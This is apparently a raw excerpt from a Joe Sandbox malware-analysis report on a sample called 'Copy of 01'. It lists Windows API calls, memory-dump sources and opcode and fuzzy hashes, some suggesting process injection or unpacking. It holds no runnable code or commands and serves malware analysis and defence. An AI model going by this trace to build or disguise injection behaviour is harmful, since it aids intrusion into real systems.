                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01381AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01381B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction ID: ee76ead71c7e2ac9d3a0947c40ce74733375bd43551546ee512322f9b792ed32
                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction Fuzzy Hash: AB12CD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4F81CB5A
                        APIs
                          • Part of subcall function 00334E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
                          • Part of subcall function 00334E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
                          • Part of subcall function 00334E90: FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
                          • Part of subcall function 00334E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
                          • Part of subcall function 00334E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
                          • Part of subcall function 00334E59: FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$Load$AddressFreeProc
                        • String ID:
                        • API String ID: 2632591731-0
                        • Opcode ID: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                        • Instruction ID: 0635c3e311656b1488d22117a5f7a59262ce1c8608b7c0a4e73c05c02d53b189
                        • Opcode Fuzzy Hash: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                        • Instruction Fuzzy Hash: 5E112332610205AACF27AB64DC82FAD77A9AF40B11F14842DF442AE1C1EE74EE059B50
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __wsopen_s
                        • String ID:
                        • API String ID: 3347428461-0
                        • Opcode ID: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                        • Instruction ID: e03b1860b14c75a4dd8915eefb821daf6a789162ff952bc16afb23bb39350094
                        • Opcode Fuzzy Hash: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                        • Instruction Fuzzy Hash: B8115E7190410AAFCF06DF58E94099E7BF4EF48300F118159FC08AB311DB30DA11CB64
                        APIs
                          • Part of subcall function 00364C7D: RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                        • _free.LIBCMT ref: 0036506C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction ID: 0db2f4090693b0787ded5eb7a6b2c2d634521ed33134f84736b05a5367fc33ed
                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction Fuzzy Hash: 930149726047056BE3328F65D885A9AFBECFB89370F26452DF184872C0EB30A805C7B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction ID: b30988700cf2b9736134b6dfb1a057069fffd976fc13dbb9fb189879be87ecf1
                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction Fuzzy Hash: 43F0F432510A10AAC7373A69DC05F5B339D9F523B3F114B15FC219A1E2CB74D90A86E5
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                        • Instruction ID: 0bacec0b9821714b25b82f874425631add3d9bd6992bc2604906cf18900b6b46
                        • Opcode Fuzzy Hash: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                        • Instruction Fuzzy Hash: D1F0E931E0222477DB235F669C09F5A379CBF81BA1B16C121FC19EA798CA70D80187E0
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                        • Instruction ID: 2cf55821c48fd11a81ab9eb50d58ca704f4469b6abf007a6ff389cc41ee8b237
                        • Opcode Fuzzy Hash: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                        • Instruction Fuzzy Hash: EBE065311012245AE62326679D05FDA364DAF427B1F168121BC15979A5DB21DD0983E1
                        APIs
                        • FreeLibrary.KERNEL32(?,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334F6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                        • Instruction ID: 3f4a2224b770f5b943adbb0074c412cbd91a2cac95658aad71e4a650ae29a09d
                        • Opcode Fuzzy Hash: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                        • Instruction Fuzzy Hash: D2F03071105751CFDB369F65D4D0C12B7E4EF1431971989BEE1DA82621C731B844DF10
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LongNamePath_wcslen
                        • String ID:
                        • API String ID: 541455249-0
                        • Opcode ID: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
                        • Instruction ID: 6346e4f0b0c98929a1b22679263779550ec29980a0d1a42b1304a5e7413182d5
                        • Opcode Fuzzy Hash: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
                        • Instruction Fuzzy Hash: 24E0CD72A001245BCB2192589C06FDA77DDDFC8790F044171FD0DD7248D964AD808650
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID:
                        • API String ID: 2638373210-0
                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction ID: 2cd68d873279b0e8104e08730d2c72de325377209425b602f3b4c4f233cec5a7
                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction Fuzzy Hash: 1AE048B06097005FDF3D5A28A9517B777E4DF4A301F01045EF59F86362E5726845864D
                        APIs
                          • Part of subcall function 00333837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
                          • Part of subcall function 0033D730: GetInputState.USER32 ref: 0033D807
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
                          • Part of subcall function 003330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0033314E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                        • String ID:
                        • API String ID: 3667716007-0
                        • Opcode ID: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
                        • Instruction ID: 85978609952f98b87d66c0b07f4000739faeb47cb577b449dc7e6a8b379fd551
                        • Opcode Fuzzy Hash: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
                        • Instruction Fuzzy Hash: A9E08C3270424406CA0ABB74A8D29AEA7599BD1362F40957EF1469F1B3CF788A498352
                        APIs
                        • CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                        • Instruction ID: ac8a46d0addd19556b3628a25f6ae7668807543c71acdddecb0c9aa0ecd51c45
                        • Opcode Fuzzy Hash: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                        • Instruction Fuzzy Hash: 03D06C3205010DBBDF028F85DD06EDA3BAAFB48714F014000FE1896020C732E821AB90
                        APIs
                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00331CBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: InfoParametersSystem
                        • String ID:
                        • API String ID: 3098949447-0
                        • Opcode ID: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                        • Instruction ID: 33387f2f6a3ff370a05c65ba35ef2c45abeaaf9cacc42fb2f3380e888f03731d
                        • Opcode Fuzzy Hash: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                        • Instruction Fuzzy Hash: 39C09236280304AFF3159B80BE4EF107768A348B00F049011FA0EB95F3C3F22821EB58
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 0e839e2b70041ca2eb664bb653471b892590581f663469870598ae1defca1f80
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: 8531C175A001099FC71ADF59D4C0A69FBE5FB4A300B2986A5E80ACF65AD731EDC1CBD0
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 013822B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction ID: 46f21150828518c1db773b9d6add362cd1719e6dc8d4835be9debea37356eb5c
                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                        • Instruction Fuzzy Hash: CBE0BF7494020EEFDB00EFA4D5496DE7BB4EF04311F1005A1FD05D7681DB319E54CA62
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 013822B1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 0f1d38c43c0c3a943d2cd47e81799e53e9082eea5b9db9564d3e14271f771581
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 44E0E67494020EDFDB00EFB4D54969E7FB4EF04301F100161FD01D2281D6319D50CA72
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003C961A
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C965B
                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 003C969F
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C96C9
                        • SendMessageW.USER32 ref: 003C96F2
                        • GetKeyState.USER32(00000011), ref: 003C978B
                        • GetKeyState.USER32(00000009), ref: 003C9798
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003C97AE
                        • GetKeyState.USER32(00000010), ref: 003C97B8
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003C97E9
                        • SendMessageW.USER32 ref: 003C9810
                        • SendMessageW.USER32(?,00001030,?,003C7E95), ref: 003C9918
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003C992E
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003C9941
                        • SetCapture.USER32(?), ref: 003C994A
                        • ClientToScreen.USER32(?,?), ref: 003C99AF
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003C99BC
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003C99D6
                        • ReleaseCapture.USER32 ref: 003C99E1
                        • GetCursorPos.USER32(?), ref: 003C9A19
                        • ScreenToClient.USER32(?,?), ref: 003C9A26
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9A80
                        • SendMessageW.USER32 ref: 003C9AAE
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9AEB
                        • SendMessageW.USER32 ref: 003C9B1A
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003C9B3B
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003C9B4A
                        • GetCursorPos.USER32(?), ref: 003C9B68
                        • ScreenToClient.USER32(?,?), ref: 003C9B75
                        • GetParent.USER32(?), ref: 003C9B93
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003C9BFA
                        • SendMessageW.USER32 ref: 003C9C2B
                        • ClientToScreen.USER32(?,?), ref: 003C9C84
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003C9CB4
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003C9CDE
                        • SendMessageW.USER32 ref: 003C9D01
                        • ClientToScreen.USER32(?,?), ref: 003C9D4E
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003C9D82
                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C9E05
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                        • String ID: @GUI_DRAGID$F$p#@
                        • API String ID: 3429851547-2648032285
                        • Opcode ID: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                        • Instruction ID: af9508be6e0fb572f4d1409759fb21310d8a1905771202ecbed07574a2db8918
                        • Opcode Fuzzy Hash: cbc28aeb089667235144f86b62906449acdce280d2217bec7e0506958bb109cd
                        • Instruction Fuzzy Hash: 44427A75204200AFD726CF24CD48FAABBE9EF49320F16461EF599D72A1D731AD60CB41
                        APIs
                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 003C48F3
                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 003C4908
                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 003C4927
                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 003C494B
                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 003C495C
                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 003C497B
                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003C49AE
                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003C49D4
                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 003C4A0F
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A56
                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 003C4A7E
                        • IsMenu.USER32(?), ref: 003C4A97
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4AF2
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C4B20
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C4B94
                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 003C4BE3
                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 003C4C82
                        • wsprintfW.USER32 ref: 003C4CAE
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4CC9
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4CF1
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C4D13
                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C4D33
                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 003C4D5A
                        Strings
                        Similarity
                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                        • String ID: %d/%02d/%02d
                        • API String ID: 4054740463-328681919
                        • Opcode ID: c614d947654e7d792b6ed9b04028103ad29e7d0112ed7e93577c913bf33500e0
                        • Instruction ID: bdb6218166c7d323c4c120638b7c2ef9361ad7744affc44735fe87b1533bc78e
                        • Opcode Fuzzy Hash: c614d947654e7d792b6ed9b04028103ad29e7d0112ed7e93577c913bf33500e0
                        • Instruction Fuzzy Hash: 9112EF71600214ABEB269F28CD59FAEBBF8EF45310F14412DF51AEA2E1DB74AD41CB50
                        APIs
                        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0034F998
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0038F474
                        • IsIconic.USER32(00000000), ref: 0038F47D
                        • ShowWindow.USER32(00000000,00000009), ref: 0038F48A
                        • SetForegroundWindow.USER32(00000000), ref: 0038F494
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4AA
                        • GetCurrentThreadId.KERNEL32 ref: 0038F4B1
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0038F4BD
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4CE
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0038F4D6
                        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0038F4DE
                        • SetForegroundWindow.USER32(00000000), ref: 0038F4E1
